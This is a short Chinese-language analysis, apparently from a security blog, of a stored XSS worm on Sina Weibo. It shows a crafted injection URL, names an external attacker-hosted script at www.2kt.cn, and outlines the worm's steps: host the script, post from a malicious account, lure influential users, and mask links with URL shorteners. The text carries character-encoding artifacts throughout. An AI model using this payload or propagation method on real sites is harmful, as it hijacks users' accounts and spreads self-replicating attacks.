發(fā)布完成后我們查看下網(wǎng)頁源代碼,如下圖:
很顯然真實的地址會被寫入到action-data的屬性中去,因此不難想象漏洞產(chǎn)生原因,由于action-data的值沒有進行合適的過濾,導(dǎo)致攻擊者可以輸入畸形的數(shù)據(jù)插入JS腳本,閉合前面的雙引號和尖括號,從而造成XSS攻擊。
構(gòu)造Xss_Exploit如下:
http://weibo.com/pub/star/g/xyyyd"> ?type=update
注:
//www.2kt.cn/images/t.js是一種合法的協(xié)議寫法,與http://www.2kt.cn/images/t.js效果一樣。
完整模擬攻擊者的攻擊手段:
1 首先將攻擊腳本存放在www.2kt.cn服務(wù)器上
2 建立惡意用戶,利用構(gòu)造的XSS_Exploit發(fā)布微博消息
3 通過發(fā)布吸引力強的熱門的話題讓有影響力的人訪問,中招者自動發(fā)微博并進行傳播
在攻擊過程中,攻擊者多次利用短連接將真實的URL進行轉(zhuǎn)換,讓一般用戶不易發(fā)現(xiàn),以便更好地延長蠕蟲的存活時間,短連接在提供簡短易記的同時,也帶來了一些新的安全問題,攻擊者可以利用這些短連接隱藏實際攻擊URL來進行攻擊.